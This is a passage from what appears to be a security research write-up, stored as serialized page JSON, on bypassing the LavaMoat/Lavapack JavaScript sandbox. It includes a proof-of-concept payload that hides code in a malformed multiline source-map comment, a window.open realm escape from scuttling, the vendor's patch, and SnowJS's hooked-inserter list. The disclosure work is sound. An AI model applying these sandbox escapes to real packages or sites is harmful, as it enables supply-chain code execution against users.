convertSourceMap.fromSource(sourceCode)\n  // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n  const maps = converter && converter.toObject()\n  const code = convertSourceMap.removeComments(sourceCode)\n  return { code, maps }\n}\n",[51226],{"type":26,"tag":130,"props":51227,"children":51228},{"__ignoreMap":7},[51229,51253,51295,51303,51344,51385,51413],{"type":26,"tag":137,"props":51230,"children":51231},{"class":5559,"line":5560},[51232,51236,51241,51245,51249],{"type":26,"tag":137,"props":51233,"children":51234},{"style":5573},[51235],{"type":32,"value":33972},{"type":26,"tag":137,"props":51237,"children":51238},{"style":5682},[51239],{"type":32,"value":51240}," extractSourceMaps",{"type":26,"tag":137,"props":51242,"children":51243},{"style":5601},[51244],{"type":32,"value":165},{"type":26,"tag":137,"props":51246,"children":51247},{"style":5584},[51248],{"type":32,"value":40610},{"type":26,"tag":137,"props":51250,"children":51251},{"style":5601},[51252],{"type":32,"value":17395},{"type":26,"tag":137,"props":51254,"children":51255},{"class":5559,"line":5412},[51256,51260,51265,51269,51274,51278,51283,51287,51291],{"type":26,"tag":137,"props":51257,"children":51258},{"style":5573},[51259],{"type":32,"value":38784},{"type":26,"tag":137,"props":51261,"children":51262},{"style":5584},[51263],{"type":32,"value":51264}," converter",{"type":26,"tag":137,"props":51266,"children":51267},{"style":5590},[51268],{"type":32,"value":5593},{"type":26,"tag":137,"props":51270,"children":51271},{"style":5584},[51272],{"type":32,"value":51273}," convertSourceMap",{"type":26,"tag":137,"props":51275,"children":51276},{"style":5601},[51277],{"type":32,"value":470},{"type":26,"tag":137,"props":51279,"children":51280},{"style":5682},[51281],{"type":32,"value":51282},"fromSource",{"type":26,"tag":137,"props":51284,"children":51285},{"style":5601},[51286],{"type":32,"value":165},{"type":26,"tag":137,"props":51288,"children":51289},{"style":5584},[51290],{"type":32,"value":40610},{"type":26,"tag":137,"props":51292,"children":51293},{"style":5601},[51294],{"type":32,"value":5742},{"type":26,"tag":137,"props":51296,"children":51297},{"class":5559,"line":5417},[51298],{"type":26,"tag":137,"props":51299,"children":51300},{"style":5564},[51301],{"type":32,"value":51302},"  // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n",{"type":26,"tag":137,"props":51304,"children":51305},{"class":5559,"line":5642},[51306,51310,51315,51319,51323,51327,51331,51335,51340],{"type":26,"tag":137,"props":51307,"children":51308},{"style":5573},[51309],{"type":32,"value":38784},{"type":26,"tag":137,"props":51311,"children":51312},{"style":5584},[51313],{"type":32,"value":51314}," maps",{"type":26,"tag":137,"props":51316,"children":51317},{"style":5590},[51318],{"type":32,"value":5593},{"type":26,"tag":137,"props":51320,"children":51321},{"style":5584},[51322],{"type":32,"value":51264},{"type":26,"tag":137,"props":51324,"children":51325},{"style":5590},[51326],{"type":32,"value":16776},{"type":26,"tag":137,"props":51328,"children":51329},{"style":5584},[51330],{"type":32,"value":51264},{"type":26,"tag":137,"props":51332,"children":51333},{"style":5601},[51334],{"type":32,"value":470},{"type":26,"tag":137,"props":51336,"children":51337},{"style":5682},[51338],{"type":32,"value":51339},"toObject",{"type":26,"tag":137,"props":51341,"children":51342},{"style":5601},[51343],{"type":32,"value":10320},{"type":26,"tag":137,"props":51345,"children":51346},{"class":5559,"line":5745},[51347,51351,51356,51360,51364,51368,51373,51377,51381],{"type":26,"tag":137,"props":51348,"children":51349},{"style":5573},[51350],{"type":32,"value":38784},{"type":26,"tag":137,"props":51352,"children":51353},{"style":5584},[51354],{"type":32,"value":51355}," code",{"type":26,"tag":137,"props":51357,"children":51358},{"style":5590},[51359],{"type":32,"value":5593},{"type":26,"tag":137,"props":51361,"children":51362},{"style":5584},[51363],{"type":32,"value":51273},{"type":26,"tag":137,"props":51365,"children":51366},{"style":5601},[51367],{"type":32,"value":470},{"type":26,"tag":137,"props":51369,"children":51370},{"style":5682},[51371],{"type":32,"value":51372},"removeComments",{"type":26,"tag":137,"props":51374,"children":51375},{"style":5601},[51376],{"type":32,"value":165},{"type":26,"tag":137,"props":51378,"children":51379},{"style":5584},[51380],{"type":32,"value":40610},{"type":26,"tag":137,"props":51382,"children":51383},{"style":5601},[51384],{"type":32,"value":5742},{"type":26,"tag":137,"props":51386,"children":51387},{"class":5559,"line":5850},[51388,51392,51396,51400,51404,51409],{"type":26,"tag":137,"props":51389,"children":51390},{"style":5610},[51391],{"type":32,"value":41795},{"type":26,"tag":137,"props":51393,"children":51394},{"style":5601},[51395],{"type":32,"value":12175},{"type":26,"tag":137,"props":51397,"children":51398},{"style":5584},[51399],{"type":32,"value":130},{"type":26,"tag":137,"props":51401,"children":51402},{"style":5601},[51403],{"type":32,"value":1108},{"type":26,"tag":137,"props":51405,"children":51406},{"style":5584},[51407],{"type":32,"value":51408},"maps",{"type":26,"tag":137,"props":51410,"children":51411},{"style":5601},[51412],{"type":32,"value":12185},{"type":26,"tag":137,"props":51414,"children":51415},{"class":5559,"line":5878},[51416],{"type":26,"tag":137,"props":51417,"children":51418},{"style":5601},[51419],{"type":32,"value":6507},{"type":26,"tag":35,"props":51421,"children":51422},{},[51423,51425,51430,51432,51437],{"type":32,"value":51424},"This code removes the source map comments of the source code, meaning that there actually is a modification of source code in Lavapack after the ",{"type":26,"tag":130,"props":51426,"children":51428},{"className":51427},[],[51429],{"type":32,"value":50867},{"type":32,"value":51431}," stage. Reviewing the ",{"type":26,"tag":130,"props":51433,"children":51435},{"className":51434},[],[51436],{"type":32,"value":51219},{"type":32,"value":51438}," code, we can see exactly how this happens.",{"type":26,"tag":5512,"props":51440,"children":51442},{"className":33958,"code":51441,"language":33960,"meta":7,"style":7},"Object.defineProperty(exports, 'commentRegex', {\n  get: function getCommentRegex () {\n    // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n    return /^\\s*?\\/[\\/\\*][@#]\\s+?sourceMappingURL=data:(((?:application|text)\\/json)(?:;charset=([^;,]+?)?)?)?(?:;(base64))?,(.*?)$/mg;\n  }\n});\n\nexports.removeComments = function (src) {\n  return src.replace(exports.commentRegex, '');\n};\n",[51443],{"type":26,"tag":130,"props":51444,"children":51445},{"__ignoreMap":7},[51446,51485,51511,51519,51733,51740,51747,51754,51789,51839],{"type":26,"tag":137,"props":51447,"children":51448},{"class":5559,"line":5560},[51449,51454,51458,51463,51467,51471,51475,51480],{"type":26,"tag":137,"props":51450,"children":51451},{"style":5584},[51452],{"type":32,"value":51453},"Object",{"type":26,"tag":137,"props":51455,"children":51456},{"style":5601},[51457],{"type":32,"value":470},{"type":26,"tag":137,"props":51459,"children":51460},{"style":5682},[51461],{"type":32,"value":51462},"defineProperty",{"type":26,"tag":137,"props":51464,"children":51465},{"style":5601},[51466],{"type":32,"value":165},{"type":26,"tag":137,"props":51468,"children":51469},{"style":6009},[51470],{"type":32,"value":40482},{"type":26,"tag":137,"props":51472,"children":51473},{"style":5601},[51474],{"type":32,"value":1108},{"type":26,"tag":137,"props":51476,"children":51477},{"style":6837},[51478],{"type":32,"value":51479},"'commentRegex'",{"type":26,"tag":137,"props":51481,"children":51482},{"style":5601},[51483],{"type":32,"value":51484},", {\n",{"type":26,"tag":137,"props":51486,"children":51487},{"class":5559,"line":5412},[51488,51493,51497,51501,51506],{"type":26,"tag":137,"props":51489,"children":51490},{"style":5682},[51491],{"type":32,"value":51492},"  get",{"type":26,"tag":137,"props":51494,"children":51495},{"style":5584},[51496],{"type":32,"value":7072},{"type":26,"tag":137,"props":51498,"children":51499},{"style":5573},[51500],{"type":32,"value":40810},{"type":26,"tag":137,"props":51502,"children":51503},{"style":5682},[51504],{"type":32,"value":51505}," getCommentRegex",{"type":26,"tag":137,"props":51507,"children":51508},{"style":5601},[51509],{"type":32,"value":51510}," () {\n",{"type":26,"tag":137,"props":51512,"children":51513},{"class":5559,"line":5417},[51514],{"type":26,"tag":137,"props":51515,"children":51516},{"style":5564},[51517],{"type":32,"value":51518},"    // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n",{"type":26,"tag":137,"props":51520,"children":51521},{"class":5559,"line":5642},[51522,51526,51532,51537,51542,51547,51551,51556,51561,51566,51570,51574,51579,51584,51589,51594,51598,51602,51606,51611,51615,51620,51625,51630,51635,51639,51643,51647,51651,51655,51659,51663,51667,51672,51677,51681,51686,51691,51695,51699,51703,51707,51712,51716,51720,51724,51729],{"type":26,"tag":137,"props":51523,"children":51524},{"style":5610},[51525],{"type":32,"value":19582},{"type":26,"tag":137,"props":51527,"children":51529},{"style":51528},"--shiki-default:#D16969",[51530],{"type":32,"value":51531}," /",{"type":26,"tag":137,"props":51533,"children":51534},{"style":5682},[51535],{"type":32,"value":51536},"^",{"type":26,"tag":137,"props":51538,"children":51539},{"style":51528},[51540],{"type":32,"value":51541},"\\s",{"type":26,"tag":137,"props":51543,"children":51544},{"style":50975},[51545],{"type":32,"value":51546},"*?\\/",{"type":26,"tag":137,"props":51548,"children":51549},{"style":6837},[51550],{"type":32,"value":3016},{"type":26,"tag":137,"props":51552,"children":51553},{"style":50975},[51554],{"type":32,"value":51555},"\\/\\*",{"type":26,"tag":137,"props":51557,"children":51558},{"style":6837},[51559],{"type":32,"value":51560},"][",{"type":26,"tag":137,"props":51562,"children":51563},{"style":51528},[51564],{"type":32,"value":51565},"@#",{"type":26,"tag":137,"props":51567,"children":51568},{"style":6837},[51569],{"type":32,"value":3079},{"type":26,"tag":137,"props":51571,"children":51572},{"style":51528},[51573],{"type":32,"value":51541},{"type":26,"tag":137,"props":51575,"children":51576},{"style":50975},[51577],{"type":32,"value":51578},"+?",{"type":26,"tag":137,"props":51580,"children":51581},{"style":51528},[51582],{"type":32,"value":51583},"sourceMappingURL=data:",{"type":26,"tag":137,"props":51585,"children":51586},{"style":6837},[51587],{"type":32,"value":51588},"(((?:",{"type":26,"tag":137,"props":51590,"children":51591},{"style":51528},[51592],{"type":32,"value":51593},"application",{"type":26,"tag":137,"props":51595,"children":51596},{"style":5682},[51597],{"type":32,"value":13006},{"type":26,"tag":137,"props":51599,"children":51600},{"style":51528},[51601],{"type":32,"value":32},{"type":26,"tag":137,"props":51603,"children":51604},{"style":6837},[51605],{"type":32,"value":200},{"type":26,"tag":137,"props":51607,"children":51608},{"style":50975},[51609],{"type":32,"value":51610},"\\/",{"type":26,"tag":137,"props":51612,"children":51613},{"style":51528},[51614],{"type":32,"value":36593},{"type":26,"tag":137,"props":51616,"children":51617},{"style":6837},[51618],{"type":32,"value":51619},")(?:",{"type":26,"tag":137,"props":51621,"children":51622},{"style":51528},[51623],{"type":32,"value":51624},";charset=",{"type":26,"tag":137,"props":51626,"children":51627},{"style":6837},[51628],{"type":32,"value":51629},"([^",{"type":26,"tag":137,"props":51631,"children":51632},{"style":51528},[51633],{"type":32,"value":51634},";,",{"type":26,"tag":137,"props":51636,"children":51637},{"style":6837},[51638],{"type":32,"value":3079},{"type":26,"tag":137,"props":51640,"children":51641},{"style":50975},[51642],{"type":32,"value":51578},{"type":26,"tag":137,"props":51644,"children":51645},{"style":6837},[51646],{"type":32,"value":200},{"type":26,"tag":137,"props":51648,"children":51649},{"style":50975},[51650],{"type":32,"value":5737},{"type":26,"tag":137,"props":51652,"children":51653},{"style":6837},[51654],{"type":32,"value":200},{"type":26,"tag":137,"props":51656,"children":51657},{"style":50975},[51658],{"type":32,"value":5737},{"type":26,"tag":137,"props":51660,"children":51661},{"style":6837},[51662],{"type":32,"value":200},{"type":26,"tag":137,"props":51664,"children":51665},{"style":50975},[51666],{"type":32,"value":5737},{"type":26,"tag":137,"props":51668,"children":51669},{"style":6837},[51670],{"type":32,"value":51671},"(?:",{"type":26,"tag":137,"props":51673,"children":51674},{"style":51528},[51675],{"type":32,"value":51676},";",{"type":26,"tag":137,"props":51678,"children":51679},{"style":6837},[51680],{"type":32,"value":165},{"type":26,"tag":137,"props":51682,"children":51683},{"style":51528},[51684],{"type":32,"value":51685},"base64",{"type":26,"tag":137,"props":51687,"children":51688},{"style":6837},[51689],{"type":32,"value":51690},"))",{"type":26,"tag":137,"props":51692,"children":51693},{"style":50975},[51694],{"type":32,"value":5737},{"type":26,"tag":137,"props":51696,"children":51697},{"style":51528},[51698],{"type":32,"value":180},{"type":26,"tag":137,"props":51700,"children":51701},{"style":6837},[51702],{"type":32,"value":165},{"type":26,"tag":137,"props":51704,"children":51705},{"style":51528},[51706],{"type":32,"value":470},{"type":26,"tag":137,"props":51708,"children":51709},{"style":50975},[51710],{"type":32,"value":51711},"*?",{"type":26,"tag":137,"props":51713,"children":51714},{"style":6837},[51715],{"type":32,"value":200},{"type":26,"tag":137,"props":51717,"children":51718},{"style":5682},[51719],{"type":32,"value":12878},{"type":26,"tag":137,"props":51721,"children":51722},{"style":51528},[51723],{"type":32,"value":7162},{"type":26,"tag":137,"props":51725,"children":51726},{"style":5573},[51727],{"type":32,"value":51728},"mg",{"type":26,"tag":137,"props":51730,"children":51731},{"style":5601},[51732],{"type":32,"value":5604},{"type":26,"tag":137,"props":51734,"children":51735},{"class":5559,"line":5745},[51736],{"type":26,"tag":137,"props":51737,"children":51738},{"style":5601},[51739],{"type":32,"value":8457},{"type":26,"tag":137,"props":51741,"children":51742},{"class":5559,"line":5850},[51743],{"type":26,"tag":137,"props":51744,"children":51745},{"style":5601},[51746],{"type":32,"value":37934},{"type":26,"tag":137,"props":51748,"children":51749},{"class":5559,"line":5878},[51750],{"type":26,"tag":137,"props":51751,"children":51752},{"emptyLinePlaceholder":18},[51753],{"type":32,"value":6276},{"type":26,"tag":137,"props":51755,"children":51756},{"class":5559,"line":5891},[51757,51761,51765,51769,51773,51777,51781,51785],{"type":26,"tag":137,"props":51758,"children":51759},{"style":6009},[51760],{"type":32,"value":40482},{"type":26,"tag":137,"props":51762,"children":51763},{"style":5601},[51764],{"type":32,"value":470},{"type":26,"tag":137,"props":51766,"children":51767},{"style":5682},[51768],{"type":32,"value":51372},{"type":26,"tag":137,"props":51770,"children":51771},{"style":5590},[51772],{"type":32,"value":5593},{"type":26,"tag":137,"props":51774,"children":51775},{"style":5573},[51776],{"type":32,"value":40810},{"type":26,"tag":137,"props":51778,"children":51779},{"style":5601},[51780],{"type":32,"value":4625},{"type":26,"tag":137,"props":51782,"children":51783},{"style":5584},[51784],{"type":32,"value":35265},{"type":26,"tag":137,"props":51786,"children":51787},{"style":5601},[51788],{"type":32,"value":17395},{"type":26,"tag":137,"props":51790,"children":51791},{"class":5559,"line":5909},[51792,51796,51800,51804,51809,51813,51817,51821,51826,51830,51835],{"type":26,"tag":137,"props":51793,"children":51794},{"style":5610},[51795],{"type":32,"value":41795},{"type":26,"tag":137,"props":51797,"children":51798},{"style":5584},[51799],{"type":32,"value":50963},{"type":26,"tag":137,"props":51801,"children":51802},{"style":5601},[51803],{"type":32,"value":470},{"type":26,"tag":137,"props":51805,"children":51806},{"style":5682},[51807],{"type":32,"value":51808},"replace",{"type":26,"tag":137,"props":51810,"children":51811},{"style":5601},[51812],{"type":32,"value":165},{"type":26,"tag":137,"props":51814,"children":51815},{"style":6009},[51816],{"type":32,"value":40482},{"type":26,"tag":137,"props":51818,"children":51819},{"style":5601},[51820],{"type":32,"value":470},{"type":26,"tag":137,"props":51822,"children":51823},{"style":5584},[51824],{"type":32,"value":51825},"commentRegex",{"type":26,"tag":137,"props":51827,"children":51828},{"style":5601},[51829],{"type":32,"value":1108},{"type":26,"tag":137,"props":51831,"children":51832},{"style":6837},[51833],{"type":32,"value":51834},"''",{"type":26,"tag":137,"props":51836,"children":51837},{"style":5601},[51838],{"type":32,"value":6430},{"type":26,"tag":137,"props":51840,"children":51841},{"class":5559,"line":5930},[51842],{"type":26,"tag":137,"props":51843,"children":51844},{"style":5601},[51845],{"type":32,"value":19170},{"type":26,"tag":35,"props":51847,"children":51848},{},[51849,51851,51857],{"type":32,"value":51850},"Looking deeper at the RegEx, it matches the start of the multiple line comment (",{"type":26,"tag":130,"props":51852,"children":51854},{"className":51853},[],[51855],{"type":32,"value":51856},"/*",{"type":32,"value":51858},") but doesn't match the end of it, meaning that the syntax would break in the case of multiline source map comments.",{"type":26,"tag":118,"props":51860,"children":51862},{"id":51861},"the-bypass",[51863],{"type":32,"value":51864},"The Bypass",{"type":26,"tag":35,"props":51866,"children":51867},{},[51868,51870,51875,51877,51882],{"type":32,"value":51869},"By abusing the ",{"type":26,"tag":130,"props":51871,"children":51873},{"className":51872},[],[51874],{"type":32,"value":51372},{"type":32,"value":51876}," function, we could bypass the Lavamoat restrictions by escaping the ",{"type":26,"tag":130,"props":51878,"children":51880},{"className":51879},[],[51881],{"type":32,"value":50716},{"type":32,"value":51883}," sandbox. To do so, we created a multiline source map comment, and injected the invalid javascript inside the comment:",{"type":26,"tag":5512,"props":51885,"children":51887},{"className":33958,"code":51886,"language":33960,"meta":7,"style":7},"/*# sourceMappingURL=data:,{}\n\n}}}}\n}, {\n    package: \"xpl\",\n    file: \"node_modules/xpl/index.js\",\n    test: alert(document.domain),\n    test1: () => { () => { () => { () => {\n\n/*\n*/\n",[51888],{"type":26,"tag":130,"props":51889,"children":51890},{"__ignoreMap":7},[51891,51899,51906,51914,51922,51930,51938,51946,51954,51961,51969],{"type":26,"tag":137,"props":51892,"children":51893},{"class":5559,"line":5560},[51894],{"type":26,"tag":137,"props":51895,"children":51896},{"style":5564},[51897],{"type":32,"value":51898},"/*# sourceMappingURL=data:,{}\n",{"type":26,"tag":137,"props":51900,"children":51901},{"class":5559,"line":5412},[51902],{"type":26,"tag":137,"props":51903,"children":51904},{"emptyLinePlaceholder":18},[51905],{"type":32,"value":6276},{"type":26,"tag":137,"props":51907,"children":51908},{"class":5559,"line":5417},[51909],{"type":26,"tag":137,"props":51910,"children":51911},{"style":5564},[51912],{"type":32,"value":51913},"}}}}\n",{"type":26,"tag":137,"props":51915,"children":51916},{"class":5559,"line":5642},[51917],{"type":26,"tag":137,"props":51918,"children":51919},{"style":5564},[51920],{"type":32,"value":51921},"}, {\n",{"type":26,"tag":137,"props":51923,"children":51924},{"class":5559,"line":5745},[51925],{"type":26,"tag":137,"props":51926,"children":51927},{"style":5564},[51928],{"type":32,"value":51929},"    package: \"xpl\",\n",{"type":26,"tag":137,"props":51931,"children":51932},{"class":5559,"line":5850},[51933],{"type":26,"tag":137,"props":51934,"children":51935},{"style":5564},[51936],{"type":32,"value":51937},"    file: \"node_modules/xpl/index.js\",\n",{"type":26,"tag":137,"props":51939,"children":51940},{"class":5559,"line":5878},[51941],{"type":26,"tag":137,"props":51942,"children":51943},{"style":5564},[51944],{"type":32,"value":51945},"    test: alert(document.domain),\n",{"type":26,"tag":137,"props":51947,"children":51948},{"class":5559,"line":5891},[51949],{"type":26,"tag":137,"props":51950,"children":51951},{"style":5564},[51952],{"type":32,"value":51953},"    test1: () => { () => { () => { () => {\n",{"type":26,"tag":137,"props":51955,"children":51956},{"class":5559,"line":5909},[51957],{"type":26,"tag":137,"props":51958,"children":51959},{"emptyLinePlaceholder":18},[51960],{"type":32,"value":6276},{"type":26,"tag":137,"props":51962,"children":51963},{"class":5559,"line":5930},[51964],{"type":26,"tag":137,"props":51965,"children":51966},{"style":5564},[51967],{"type":32,"value":51968},"/*\n",{"type":26,"tag":137,"props":51970,"children":51971},{"class":5559,"line":5939},[51972],{"type":26,"tag":137,"props":51973,"children":51974},{"style":5564},[51975],{"type":32,"value":51976},"*/\n",{"type":26,"tag":35,"props":51978,"children":51979},{},[51980],{"type":32,"value":51981},"This allows malicious code to execute without breaking any other package or feature. This payload also makes the supply chain attack more impactful. Any injected code is executed as soon as the bundle file is imported.",{"type":26,"tag":118,"props":51983,"children":51985},{"id":51984},"lavapack-patch",[51986],{"type":32,"value":51987},"Lavapack Patch",{"type":26,"tag":35,"props":51989,"children":51990},{},[51991,51993,51999],{"type":32,"value":51992},"Metamask mitigated the issues we reported on Lavapack by defining ",{"type":26,"tag":130,"props":51994,"children":51996},{"className":51995},[],[51997],{"type":32,"value":51998},"assertValidJS",{"type":32,"value":52000},", an independent check that differs from the browserify syntax check we used to exploit the issue.",{"type":26,"tag":35,"props":52002,"children":52003},{},[52004,52006,52013],{"type":32,"value":52005},"The patch was introduced in commit ",{"type":26,"tag":41,"props":52007,"children":52010},{"href":52008,"rel":52009},"https://github.com/LavaMoat/LavaMoat/commit/9c38cd47e7875dde53349dd34971c74ce34004d9",[45],[52011],{"type":32,"value":52012},"9c38cd4",{"type":32,"value":470},{"type":26,"tag":5512,"props":52015,"children":52017},{"className":42957,"code":52016,"language":42959,"meta":7,"style":7},"+ function assertValidJS(code) {\n+  try {\n+    new Function(code)\n+  } catch (err) {\n+    throw new Error(`Invalid JavaScript: ${err.message}`)\n+  }\n+ }\n\n+  // additional layer of syntax checking independent of browserify\n+  assertValidJS(sourceMeta.code) \n\n",[52018],{"type":26,"tag":130,"props":52019,"children":52020},{"__ignoreMap":7},[52021,52029,52037,52045,52053,52061,52069,52077,52084,52092],{"type":26,"tag":137,"props":52022,"children":52023},{"class":5559,"line":5560},[52024],{"type":26,"tag":137,"props":52025,"children":52026},{"style":5626},[52027],{"type":32,"value":52028},"+ function assertValidJS(code) {\n",{"type":26,"tag":137,"props":52030,"children":52031},{"class":5559,"line":5412},[52032],{"type":26,"tag":137,"props":52033,"children":52034},{"style":5626},[52035],{"type":32,"value":52036},"+  try {\n",{"type":26,"tag":137,"props":52038,"children":52039},{"class":5559,"line":5417},[52040],{"type":26,"tag":137,"props":52041,"children":52042},{"style":5626},[52043],{"type":32,"value":52044},"+    new Function(code)\n",{"type":26,"tag":137,"props":52046,"children":52047},{"class":5559,"line":5642},[52048],{"type":26,"tag":137,"props":52049,"children":52050},{"style":5626},[52051],{"type":32,"value":52052},"+  } catch (err) {\n",{"type":26,"tag":137,"props":52054,"children":52055},{"class":5559,"line":5745},[52056],{"type":26,"tag":137,"props":52057,"children":52058},{"style":5626},[52059],{"type":32,"value":52060},"+    throw new Error(`Invalid JavaScript: ${err.message}`)\n",{"type":26,"tag":137,"props":52062,"children":52063},{"class":5559,"line":5850},[52064],{"type":26,"tag":137,"props":52065,"children":52066},{"style":5626},[52067],{"type":32,"value":52068},"+  }\n",{"type":26,"tag":137,"props":52070,"children":52071},{"class":5559,"line":5878},[52072],{"type":26,"tag":137,"props":52073,"children":52074},{"style":5626},[52075],{"type":32,"value":52076},"+ }\n",{"type":26,"tag":137,"props":52078,"children":52079},{"class":5559,"line":5891},[52080],{"type":26,"tag":137,"props":52081,"children":52082},{"emptyLinePlaceholder":18},[52083],{"type":32,"value":6276},{"type":26,"tag":137,"props":52085,"children":52086},{"class":5559,"line":5909},[52087],{"type":26,"tag":137,"props":52088,"children":52089},{"style":5626},[52090],{"type":32,"value":52091},"+  // additional layer of syntax checking independent of browserify\n",{"type":26,"tag":137,"props":52093,"children":52094},{"class":5559,"line":5930},[52095],{"type":26,"tag":137,"props":52096,"children":52097},{"style":5626},[52098],{"type":32,"value":52099},"+  assertValidJS(sourceMeta.code)\n",{"type":26,"tag":92,"props":52101,"children":52103},{"id":52102},"hacking-js-realms",[52104],{"type":32,"value":52105},"Hacking JS Realms",{"type":26,"tag":35,"props":52107,"children":52108},{},[52109,52111,52116],{"type":32,"value":52110},"Lavamoat scuttling removes unnecessary and dangerous attributes from the ",{"type":26,"tag":130,"props":52112,"children":52114},{"className":52113},[],[52115],{"type":32,"value":40013},{"type":32,"value":52117}," object. However, this can be easily bypassed when Lavamoat is running in a browser context.",{"type":26,"tag":5512,"props":52119,"children":52121},{"className":33958,"code":52120,"language":33960,"meta":7,"style":7},"const w = window.open('/non_existent');\nw.alert(document.domain)\n",[52122],{"type":26,"tag":130,"props":52123,"children":52124},{"__ignoreMap":7},[52125,52167],{"type":26,"tag":137,"props":52126,"children":52127},{"class":5559,"line":5560},[52128,52132,52137,52141,52145,52149,52154,52158,52163],{"type":26,"tag":137,"props":52129,"children":52130},{"style":5573},[52131],{"type":32,"value":12244},{"type":26,"tag":137,"props":52133,"children":52134},{"style":5584},[52135],{"type":32,"value":52136}," w",{"type":26,"tag":137,"props":52138,"children":52139},{"style":5590},[52140],{"type":32,"value":5593},{"type":26,"tag":137,"props":52142,"children":52143},{"style":5584},[52144],{"type":32,"value":34003},{"type":26,"tag":137,"props":52146,"children":52147},{"style":5601},[52148],{"type":32,"value":470},{"type":26,"tag":137,"props":52150,"children":52151},{"style":5682},[52152],{"type":32,"value":52153},"open",{"type":26,"tag":137,"props":52155,"children":52156},{"style":5601},[52157],{"type":32,"value":165},{"type":26,"tag":137,"props":52159,"children":52160},{"style":6837},[52161],{"type":32,"value":52162},"'/non_existent'",{"type":26,"tag":137,"props":52164,"children":52165},{"style":5601},[52166],{"type":32,"value":6430},{"type":26,"tag":137,"props":52168,"children":52169},{"class":5559,"line":5412},[52170,52175,52179,52183,52187,52191,52195,52199],{"type":26,"tag":137,"props":52171,"children":52172},{"style":5584},[52173],{"type":32,"value":52174},"w",{"type":26,"tag":137,"props":52176,"children":52177},{"style":5601},[52178],{"type":32,"value":470},{"type":26,"tag":137,"props":52180,"children":52181},{"style":5682},[52182],{"type":32,"value":35293},{"type":26,"tag":137,"props":52184,"children":52185},{"style":5601},[52186],{"type":32,"value":165},{"type":26,"tag":137,"props":52188,"children":52189},{"style":5584},[52190],{"type":32,"value":35303},{"type":26,"tag":137,"props":52192,"children":52193},{"style":5601},[52194],{"type":32,"value":470},{"type":26,"tag":137,"props":52196,"children":52197},{"style":5584},[52198],{"type":32,"value":35313},{"type":26,"tag":137,"props":52200,"children":52201},{"style":5601},[52202],{"type":32,"value":5742},{"type":26,"tag":35,"props":52204,"children":52205},{},[52206,52208,52213],{"type":32,"value":52207},"This opens a new window with a new JS Realm (another ",{"type":26,"tag":130,"props":52209,"children":52211},{"className":52210},[],[52212],{"type":32,"value":40013},{"type":32,"value":52214}," object), and uses it to execute code in the context of the scuttled window. Note that the window needs to be same-origin and must not be scuttled.",{"type":26,"tag":35,"props":52216,"children":52217},{},[52218,52220,52227],{"type":32,"value":52219},"As a mitigation, some applications integrate SnowJS with scuttling, so every new same-origin window and iframe will be detected and scuttled (check the ",{"type":26,"tag":41,"props":52221,"children":52224},{"href":52222,"rel":52223},"https://github.com/MetaMask/metamask-extension/blob/3996f505a6a156d96077acb49579e6fc9e78cd45/app/scripts/use-snow.js#L22",[45],[52225],{"type":32,"value":52226},"Metamask implementation",{"type":32,"value":200},{"type":26,"tag":118,"props":52229,"children":52231},{"id":52230},"snowjs-attack-surface",[52232],{"type":32,"value":52233},"SnowJS Attack Surface",{"type":26,"tag":35,"props":52235,"children":52236},{},[52237],{"type":32,"value":52238},"SnowJS is a javascript sandbox implementation that secures same-origin realms in browser applications. It is configured to detect new realms and attach them to the sandbox.",{"type":26,"tag":35,"props":52240,"children":52241},{},[52242,52244,52251],{"type":32,"value":52243},"As a mechanism, it hooks functions that can be used to create realms (an iframe, for example). For example, here are some of the ",{"type":26,"tag":41,"props":52245,"children":52248},{"href":52246,"rel":52247},"https://github.com/LavaMoat/snow/blob/ecf1add05c774b90b8baeff934b2e40585e13ca4/src/inserters.js#L9",[45],[52249],{"type":32,"value":52250},"hooked inserters",{"type":32,"value":52252}," functions:",{"type":26,"tag":5512,"props":52254,"children":52256},{"className":33958,"code":52255,"language":33960,"meta":7,"style":7},"const map = {\n    Range: ['insertNode'],\n    DocumentFragment: ['replaceChildren', 'append', 'prepend'],\n    Document: ['replaceChildren', 'append', 'prepend', 'write', 'writeln'],\n    Node: ['appendChild', 'insertBefore', 'replaceChild'],\n    Element: ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'replaceWith', 'insertAdjacentElement', 'append', 'before', 'prepend', 'after', 'replaceChildren'],\n    ShadowRoot: ['innerHTML'],\n    HTMLIFrameElement: ['srcdoc'],\n};\n",[52257],{"type":26,"tag":130,"props":52258,"children":52259},{"__ignoreMap":7},[52260,52280,52301,52340,52394,52433,52532,52552,52573],{"type":26,"tag":137,"props":52261,"children":52262},{"class":5559,"line":5560},[52263,52267,52272,52276],{"type":26,"tag":137,"props":52264,"children":52265},{"style":5573},[52266],{"type":32,"value":12244},{"type":26,"tag":137,"props":52268,"children":52269},{"style":5584},[52270],{"type":32,"value":52271}," map",{"type":26,"tag":137,"props":52273,"children":52274},{"style":5590},[52275],{"type":32,"value":5593},{"type":26,"tag":137,"props":52277,"children":52278},{"style":5601},[52279],{"type":32,"value":5875},{"type":26,"tag":137,"props":52281,"children":52282},{"class":5559,"line":5412},[52283,52288,52292,52297],{"type":26,"tag":137,"props":52284,"children":52285},{"style":5584},[52286],{"type":32,"value":52287},"    Range:",{"type":26,"tag":137,"props":52289,"children":52290},{"style":5601},[52291],{"type":32,"value":25612},{"type":26,"tag":137,"props":52293,"children":52294},{"style":6837},[52295],{"type":32,"value":52296},"'insertNode'",{"type":26,"tag":137,"props":52298,"children":52299},{"style":5601},[52300],{"type":32,"value":16854},{"type":26,"tag":137,"props":52302,"children":52303},{"class":5559,"line":5417},[52304,52309,52313,52318,52322,52327,52331,52336],{"type":26,"tag":137,"props":52305,"children":52306},{"style":5584},[52307],{"type":32,"value":52308},"    